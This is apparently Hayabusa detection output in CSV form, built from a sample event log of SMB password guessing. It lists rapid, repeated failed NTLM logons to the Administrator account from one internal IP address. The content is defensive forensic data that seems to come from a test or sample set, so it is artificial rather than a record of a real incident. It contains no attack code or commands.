2016-09-20 01:51:25.294 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8xD2aZArxVdrO6fG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.392 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHJN2mJgwQEZhXBG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: untyxmsmYrfRlHcu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eOc2R5V6p9VBsYI2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V5Ld2NDMjbY3tiT7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ykdbglaCU82nRvk5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tDGrsVIC5qVEwC6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UouNQa3EkcsMICiO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u0exIftdu0qPLrRC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.776 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q5mMNIdJj0BItrv6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pb2cVBffdBlwwGQP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p2FbHoSFFdnM4wH7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RAbCN4xKDDlhmrkU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pxBwuSDdNZlE2F96 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M3JkwIQF7yV42rOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.062 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6QiHHeHeY8yWOiJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.097 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rhzpo2bEgpJCB51w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.145 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuyPyMMT4wQhLIEz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: no5bOZf3SEsrETun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vBTHVleOipnyVFIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JNFE2jNifGI7pELk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LgkAKJ57rYqCdbew | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daKQcllU63lW4ypy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GBSPSAoEBS7JRYuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.469 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94bI5pb8CGjY3QZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.525 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1obedLuMFlHlSvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EPn1yJV358YAFALV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qA7N5DMAJqNYkumM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.663 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Lk95NYGG5iLBFBw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.709 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x3DDtXECsK61pIYy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rt8bfBDTV5wYfBO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.797 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uTYMgN5kmFpyj7xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RmyF6j61wosCE0sg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fd61fJBRizl2AIGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:26.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDIFX7lsmGqSGvkA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UVmto6S25gU2bkwa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7QMbzSuGuzzMK0v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJUynF5bN1Oj0vaP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.221 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dg4ZtybY5BnPN0nX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gRmRV9ct3hor8Muk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QRjaP1mj9FgKsGBE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3CCzzatQ195mcxQ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QJPIrtk5GBAhsUlR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 720RHwyXQcxvsJBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.606 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GofmHRstuhljMDOL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.649 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wQUQ4INktwXwRkaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WHs5hduf7SmUcLK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gdo1txjJXiRLbUDH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JK8jP3ftKQOyutGe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdbEjo88dBJRhrKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FZCVkXkwhbuSM654 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:27.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z2mc9WScfBa88rtO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.011 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lee7qYLkXQoz8rRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f5g1ZKpZuZU1WRoC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.108 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: h4ST7RrHJxAQHHbn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GtW1hBHF97YqvN4N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xVKlPytPofO9LQBm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GOkZ9yjvfL51UYXo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fAxfxSbRqGO7Dej0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D7XmvDYk6zFLir09 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.355 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mWcl6CKdSMxd8edZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SxBQlFZvGBqDdobn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AXN94VanwME6q8rc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOj7CZ3stJXePY8b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXjmqxguFGL3f8cV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHWmdxnRrMbxrdlN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6ROBnjuyHn4FRugk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zGxuUxasL680O21l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CYoM984EzAkUtBoa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0e3ATNpzeeAf6Qax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1A0dGhpVy8kgiRP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGgNAKJM5RAt9B5K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c3DpedXujvQpZnjQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BsaSjESaUHbsIxJL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
